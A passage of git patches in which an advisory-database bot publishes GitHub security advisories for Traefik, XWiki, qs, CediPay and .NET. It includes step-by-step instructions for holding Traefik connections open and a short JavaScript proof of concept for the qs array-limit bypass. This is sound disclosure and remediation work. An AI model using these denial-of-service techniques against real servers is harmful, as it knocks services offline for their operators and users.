\n.transport.respondingTimeouts.readTimeout` to prevent protocol detection and request reads from blocking forever (see `pkg/server/server_entrypoint_tcp.go`, which sets `SetReadDeadline` on accepted connections).\n\nHowever, in the TCP router protocol detection path (`pkg/server/router/tcp/router.go`), when Traefik detects the Postgres STARTTLS signature on a new connection, it executes a fast-path that clears deadlines:\n\n- detect Postgres SSLRequest (8-byte signature),\n- call `conn.SetDeadline(time.Time{})` (clears all deadlines),\n- then enter the Postgres STARTTLS handler (`servePostgres`).\n\nThe Postgres handler (`pkg/server/router/tcp/postgres.go`) then blocks waiting for a TLS ClientHello via the same peeking logic used elsewhere (`clientHelloInfo(br)`), but with deadlines removed. An attacker can therefore:\n\n1. connect to any internet-exposed TCP entrypoint,\n2. send the Postgres SSLRequest (SSL negotiation request),\n3. receive Traefik’s single-byte response (`S`),\n4. stop sending any further bytes.\n\n\nEach such connection remains open past the configured `readTimeout` (indefinitely), consuming a goroutine and a file descriptor until Traefik hits process limits.\n\n_Of note_: CVE-2026-22045 fixed a conceptually-similar DoS where a protocol-specific fast path cleared connection deadlines and then could block in TLS handshake processing, allowing unauthenticated clients to tie up goroutines/FDs indefinitely. This report is the same failure mode, but triggered via the Postgres STARTTLS detection path.\n\nTested versions:\n- `v3.6.7`\n- `master` at commit `a4a91344edcdd6276c1b766ca19ee3f0e346480f` \n\n### PoC\nPrerequisites:\n- Linux host\n- Python 3\n- A prebuilt Traefik `v3.6.7` binary. The script below expects the path in the script’s `TRAEFIK_BIN` constant (edit if needed).\n\nExecute the script below:\n
",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/traefik/traefik/v3"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.6.8"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 3.6.7"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/traefik/traefik"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/traefik/traefik/releases/tag/v3.6.8"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-400"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-12T15:54:11Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
From 07a961c7cbf279aa21f26fa22e61bb9e16a6a712 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Thu, 12 Feb 2026 15:57:34 +0000
Subject: [PATCH 037/215] Publish GHSA-74rh-c5rh-88vg
---
.../GHSA-74rh-c5rh-88vg.json | 115 ++++++++++++++++++
1 file changed, 115 insertions(+)
create mode 100644 advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json
diff --git a/advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json b/advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json
new file mode 100644
index 0000000000000..9e0bd5d594089
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json
@@ -0,0 +1,115 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-74rh-c5rh-88vg",
+ "modified": "2026-02-12T15:54:20Z",
+ "published": "2026-02-12T15:54:19Z",
+ "aliases": [
+ "CVE-2026-26000"
+ ],
+ "summary": "XWiki vulnerable to click-jacking through CSS injection in comments",
+ "details": "### Impact\n\nIt's possible using comments to inject CSS that would transform the full wiki in a link area leading to a malicious page. All versions of XWiki are impacted by this kind of attack. \n\n### Patches\n\nThe problem has been patched not by preventing injecting CSS in comments, which is currently a feature of XWiki, but by requiring confirmation from users when driving them to untrusted domains after clicking on a link, thus preventing any click-jacking attack. \nThis security measure has been put in place in XWiki 17.9.0, 17.4.6, 16.10.13.\n\n### Workarounds\n\nThere's no out-of-the-box workaround, but it should be possible to partly reuse [the javascript code provided for the security measure](https://github.com/xwiki/xwiki-platform/blob/xwiki-platform-17.9.0/xwiki-platform-core/xwiki-platform-web/xwiki-platform-web-war/src/main/webapp/resources/uicomponents/link/link-protection.js) in a JSX object inside the wiki, to request the same kind of confirmation. \n\n### References\n * JIRA ticket: https://jira.xwiki.org/browse/XWIKI-23433\n * Documentation of the new security measure: https://www.xwiki.org/xwiki/bin/view/ReleaseNotes/Data/XWiki/17.9.0RC1/Entry006/\n * Commit for the security fix: https://github.com/xwiki/xwiki-platform/commit/29cb81f3a5387cf822d7e7534bdd63903275f86b\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n\n### Attribution\n\nThanks Tomas Keech (Sentrium Security Ltd) for reporting this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.xwiki.platform:xwiki-platform-web"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "17.5.0"
+ },
+ {
+ "fixed": "17.9.0"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.xwiki.platform:xwiki-platform-web"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "17.0.0-rc-1"
+ },
+ {
+ "fixed": "17.4.6"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.xwiki.platform:xwiki-platform-web"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "16.10.13"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-74rh-c5rh-88vg"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/xwiki/xwiki-platform/pull/4645"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/xwiki/xwiki-platform/commit/29cb81f3a5387cf822d7e7534bdd63903275f86b"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/xwiki/xwiki-platform/commit/7b5a4f8c34d9b1da3d966e17f7dbccabac448e75"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/xwiki/xwiki-platform"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jira.xwiki.org/browse/XWIKI-23433"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.xwiki.org/xwiki/bin/view/ReleaseNotes/Data/XWiki/17.9.0RC1/Entry006"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-1021"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-12T15:54:19Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
From c2e97091de6ca2233d1c06d077507857a1ecf0dd Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Thu, 12 Feb 2026 17:06:12 +0000
Subject: [PATCH 038/215] Publish Advisories
GHSA-w7fw-mjwx-w883
GHSA-wvr6-395c-5pxr
---
.../GHSA-w7fw-mjwx-w883.json | 68 +++++++++++++++++++
.../GHSA-wvr6-395c-5pxr.json | 57 ++++++++++++++++
2 files changed, 125 insertions(+)
create mode 100644 advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json
create mode 100644 advisories/github-reviewed/2026/02/GHSA-wvr6-395c-5pxr/GHSA-wvr6-395c-5pxr.json
diff --git a/advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json b/advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json
new file mode 100644
index 0000000000000..cb54163c293f7
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json
@@ -0,0 +1,68 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w7fw-mjwx-w883",
+ "modified": "2026-02-12T17:04:39Z",
+ "published": "2026-02-12T17:04:39Z",
+ "aliases": [
+ "CVE-2026-2391"
+ ],
+ "summary": "qs's arrayLimit bypass in comma parsing allows denial of service",
+ "details": "### Summary\nThe `arrayLimit` option in qs does not enforce limits for comma-separated values when `comma: true` is enabled, allowing attackers to cause denial-of-service via memory exhaustion. This is a bypass of the array limit enforcement, similar to the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p (CVE-2025-15284).\n\n### Details\nWhen the `comma` option is set to `true` (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., `?param=a,b,c` becomes `['a', 'b', 'c']`). However, the limit check for `arrayLimit` (default: 20) and the optional throwOnLimitExceeded occur after the comma-handling logic in `parseArrayValue`, enabling a bypass. This permits creation of arbitrarily large arrays from a single parameter, leading to excessive memory allocation.\n\n**Vulnerable code** (lib/parse.js: lines ~40-50):\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n return val.split(',');\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\nThe `split(',')` returns the array immediately, skipping the subsequent limit check. Downstream merging via `utils.combine` does not prevent allocation, even if it marks overflows for sparse arrays.This discrepancy allows attackers to send a single parameter with millions of commas (e.g., `?param=,,,,,,,,...`), allocating massive arrays in memory without triggering limits. It bypasses the intent of `arrayLimit`, which is enforced correctly for indexed (`a[0]=`) and bracket (`a[]=`) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p).\n\n### PoC\n**Test 1 - Basic bypass:**\n```\nnpm install qs\n```\n\n```js\nconst qs = require('qs');\n\nconst payload = 'a=' + ','.repeat(25); // 26 elements after split (bypasses arrayLimit: 5)\nconst options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true };\n\ntry {\n const result = qs.parse(payload, options);\n console.log(result.a.length); // Outputs: 26 (bypass successful)\n} catch (e) {\n console.log('Limit enforced:', e.message); // Not thrown\n}\n```\n**Configuration:**\n- `comma: true`\n- `arrayLimit: 5`\n- `throwOnLimitExceeded: true`\n\nExpected: Throws \"Array limit exceeded\" error.\nActual: Parses successfully, creating an array of length 26.\n\n\n### Impact\nDenial of Service (DoS) via memory exhaustion.\n\n### Suggested Fix\nMove the `arrayLimit` check before the comma split in `parseArrayValue`, and enforce it on the resulting array length. Use `currentArrayLength` (already calculated upstream) for consistency with bracket notation fixes.\n\n**Current code** (lib/parse.js: lines ~40-50):\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n return val.split(',');\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\n\n**Fixed code:**\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n const splitArray = val.split(',');\n if (splitArray.length > options.arrayLimit - currentArrayLength) { // Check against remaining limit\n if (options.throwOnLimitExceeded) {\n throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n } else {\n // Optionally convert to object or truncate, per README\n return splitArray.slice(0, options.arrayLimit - currentArrayLength);\n }\n }\n return splitArray;\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\nThis aligns behavior with indexed and bracket notations, reuses `currentArrayLength`, and respects `throwOnLimitExceeded`. Update README to note the consistent enforcement.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "qs"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "6.14.2"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 6.14.1"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2391"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/ljharb/qs"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-12T17:04:39Z",
+ "nvd_published_at": "2026-02-12T05:17:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-wvr6-395c-5pxr/GHSA-wvr6-395c-5pxr.json b/advisories/github-reviewed/2026/02/GHSA-wvr6-395c-5pxr/GHSA-wvr6-395c-5pxr.json
new file mode 100644
index 0000000000000..6666e34904166
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-wvr6-395c-5pxr/GHSA-wvr6-395c-5pxr.json
@@ -0,0 +1,57 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wvr6-395c-5pxr",
+ "modified": "2026-02-12T17:04:50Z",
+ "published": "2026-02-12T17:04:50Z",
+ "aliases": [
+ "CVE-2026-26063"
+ ],
+ "summary": "CediPay Affected by Improper Input Validation in Payment Processing",
+ "details": "A vulnerability in CediPay allows attackers to bypass input validation in the transaction API.\n\nAffected users: All deployments running versions prior to the patched release.\n\nRisk: Exploitation could result in unauthorized transactions, exposure of sensitive financial data, and compromise of payment integrity.\n\nSeverity: High — potential financial loss and reputational damage.\n\nPatches\nThe issue has been fixed in version 1.2.3.\n\nUsers should upgrade to 1.2.3 or later immediately.\n\nAll versions earlier than 1.2.3 remain vulnerable.\n\nWorkarounds\nIf upgrading is not immediately possible:\n\nRestrict API access to trusted networks or IP ranges.\n\nEnforce strict input validation at the application layer.\n\nMonitor transaction logs for anomalies or suspicious activity.\n\nThese mitigations reduce exposure but do not fully eliminate the vulnerability.\n\nReferences\nOWASP Input Validation Guidelines (owasp.org in Bing)\n\nCWE-20: Improper Input Validation\n\nGitHub Security Advisory Documentation (docs.github.com in Bing)",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "cedipay-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.2.3"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/xpertforextradeinc/CediPay/security/advisories/GHSA-wvr6-395c-5pxr"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/xpertforextradeinc/CediPay"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-12T17:04:50Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
From 04cbb3f86105ff2cdab772d99f2ab60f0ab861d0 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Thu, 12 Feb 2026 17:39:15 +0000
Subject: [PATCH 039/215] Publish GHSA-qvhc-9v3j-5rfw
---
.../02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json
index 50f288c83c390..f6e20f5e308ee 100644
--- a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json
+++ b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json
@@ -1,13 +1,13 @@
{
"schema_version": "1.4.0",
"id": "GHSA-qvhc-9v3j-5rfw",
- "modified": "2026-02-10T21:32:18Z",
+ "modified": "2026-02-12T17:37:54Z",
"published": "2026-02-10T21:32:18Z",
"aliases": [
"CVE-2026-21218"
],
"summary": "Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability",
- "details": "# Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0, .NET 9.0, and .NET 10.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn attacker could exploit this vulnerability by crafting a malicious payload that bypasses the security checks in the affected System.Security.Cryptography.Cose versions, potentially leading to unauthorized access or data manipulation.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/380\n\n## Mitigation factors\n\nIf your application does not use System.Security.Cryptography.Cose it is not affected. By default, no .NET applications reference this component.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET project if it uses any of affected packages versions listed below\n\n### .NET 10\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 10.0.0, < 10.0.2 | 10.0.3\n\n### .NET 9\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 9.0.0, < 9.0.12 | 9.0.13\n\n### .NET 8\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 8.0.0, < 8.0.23 | 8.0.24\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\nTo update the Using the System.Security.Cryptography.Cose NuGet package, use one of the following methods:\n\nNuGet Package Manager UI in Visual Studio:\n- Open your project in Visual Studio.\n- Right-click on your project in Solution Explorer and select \"Manage NuGet Packages...\" or navigate to \"Project > Manage NuGet Packages\".\n- In the NuGet Package Manager window, select the \"Updates\" tab. This tab lists packages with available updates from your configured package sources.\n- Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.\n- Click the \"Update\" button.\n\nUsing the NuGet Package Manager Console in Visual Studio:\n- Open your project in Visual Studio.\n- Navigate to \"Tools > NuGet Package Manager > Package Manager Console\".\n- To update a specific package to its latest version, use the following Update-Package command:\n\n```Update-Package -Id System.Security.Cryptography.Cose```\n\nUsing the .NET CLI (Command Line Interface):\n- Open a terminal or command prompt in your project's directory.\n- To update a specific package to its latest version, use the following add package command:\n\n```dotnet add package System.Security.Cryptography.Cose```\n\nOnce you have updated the nuget package reference you must recompile and deploy your application. Additionally we recommend you update your runtime and/or SDKs, but it is not necessary to patch the vulnerability.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in a supported version of .NET, please report it to the Microsoft Security Response Center (MSRC) via the [MSRC Researcher Portal](https://msrc.microsoft.com/report/vulnerability/new). Further information can be found in the MSRC [Report an Issue FAQ](https://www.microsoft.com/msrc/faqs-report-an-issue).\n\nSecurity reports made through MSRC may qualify for the Microsoft .NET Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2026-21218](https://www.cve.org/CVERecord?id=CVE-2026-21218)\n\n### Acknowledgements\n\nvcsjones with GitHub\n\n### Revisions\n\nV1.0 (February 10, 2026): Advisory published.",
+ "details": "# Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0, .NET 9.0, and .NET 10.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn attacker could exploit this vulnerability by crafting a malicious payload that bypasses the security checks in the affected System.Security.Cryptography.Cose versions, potentially leading to unauthorized access or data manipulation.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/380\n\n## Mitigation factors\n\nIf your application does not use System.Security.Cryptography.Cose it is not affected. By default, no .NET applications reference this component.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET project if it uses any of affected packages versions listed below\n\n### .NET 10\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 10.0.0, < 10.0.2 | 10.0.3\n\n### .NET 9\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 9.0.0, < 9.0.12 | 9.0.13\n\n### .NET 8\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 8.0.0, < 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\nTo update the Using the System.Security.Cryptography.Cose NuGet package, use one of the following methods:\n\nNuGet Package Manager UI in Visual Studio:\n- Open your project in Visual Studio.\n- Right-click on your project in Solution Explorer and select \"Manage NuGet Packages...\" or navigate to \"Project > Manage NuGet Packages\".\n- In the NuGet Package Manager window, select the \"Updates\" tab. This tab lists packages with available updates from your configured package sources.\n- Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.\n- Click the \"Update\" button.\n\nUsing the NuGet Package Manager Console in Visual Studio:\n- Open your project in Visual Studio.\n- Navigate to \"Tools > NuGet Package Manager > Package Manager Console\".\n- To update a specific package to its latest version, use the following Update-Package command:\n\n```\nUpdate-Package -Id System.Security.Cryptography.Cose\n```\n\nUsing the .NET CLI (Command Line Interface):\n- Open a terminal or command prompt in your project's directory.\n- To update a specific package to its latest version, use the following add package command:\n\n```\ndotnet add package System.Security.Cryptography.Cose\n```\n\nOnce you have updated the nuget package reference you must recompile and deploy your application. Additionally we recommend you update your runtime and/or SDKs, but it is not necessary to patch the vulnerability.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in a supported version of .NET, please report it to the Microsoft Security Response Center (MSRC) via the [MSRC Researcher Portal](https://msrc.microsoft.com/report/vulnerability/new). Further information can be found in the MSRC [Report an Issue FAQ](https://www.microsoft.com/msrc/faqs-report-an-issue).\n\nSecurity reports made through MSRC may qualify for the Microsoft .NET Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2026-21218](https://www.cve.org/CVERecord?id=CVE-2026-21218)\n\n### Acknowledgements\n\nvcsjones with GitHub\n\n### Revisions\n\nV1.0 (February 10, 2026): Advisory published.",
"severity": [
{
"type": "CVSS_V3",
@@ -32,13 +32,13 @@
"introduced": "8.0.0"
},
{
- "fixed": "8.0.24"
+ "fixed": "8.0.2"
}
]
}
],
"database_specific": {
- "last_known_affected_version_range": "<= 8.0.23"
+ "last_known_affected_version_range": "<= 8.0.1"
}
},
{
@@ -60,7 +60,7 @@
}
],
"database_specific": {
- "last_known_affected_version_range": "<= 9.0.12"
+ "last_known_affected_version_range": "< 9.0.12"
}
},
{
@@ -82,7 +82,7 @@
}
],
"database_specific": {
- "last_known_affected_version_range": "<= 10.0.2"
+ "last_known_affected_version_range": "< 10.0.2"
}
}
],
From b9f835e6d9bbf68f1e95576cba5819e3ffc19305 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Thu, 12 Feb 2026 17:46:00 +0000
Subject: [PATCH 040/215] Publish GHSA-qvhc-9v3j-5rfw
---
.../2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json
index f6e20f5e308ee..bbc291a2be5e0 100644
--- a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json
+++ b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-qvhc-9v3j-5rfw",
- "modified": "2026-02-12T17:37:54Z",
+ "modified": "2026-02-12T17:44:46Z",
"published": "2026-02-10T21:32:18Z",
"aliases": [
"CVE-2026-21218"
@@ -15,7 +15,7 @@
},
{
"type": "CVSS_V4",
- "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N"
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
}
],
"affected": [
@@ -108,7 +108,7 @@
"cwe_ids": [
"CWE-166"
],
- "severity": "LOW",
+ "severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2026-02-10T21:32:18Z",
"nvd_published_at": "2026-02-10T18:16:22Z"
From 51b6b939b21d8e79aa0b96c801a1be736836829d Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Thu, 12 Feb 2026 18:30:17 +0000
Subject: [PATCH 041/215] Publish GHSA-436v-jg82-p533
---
.../GHSA-436v-jg82-p533.json | 33 ++++++++++++++++---
1 file changed, 29 insertions(+), 4 deletions(-)
rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json (52%)
diff --git a/advisories/unreviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json b/advisories/github-reviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json
similarity index 52%
rename from advisories/unreviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json
rename to advisories/github-reviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json
index f5ff61b20d2dd..3358747da2cc2 100644
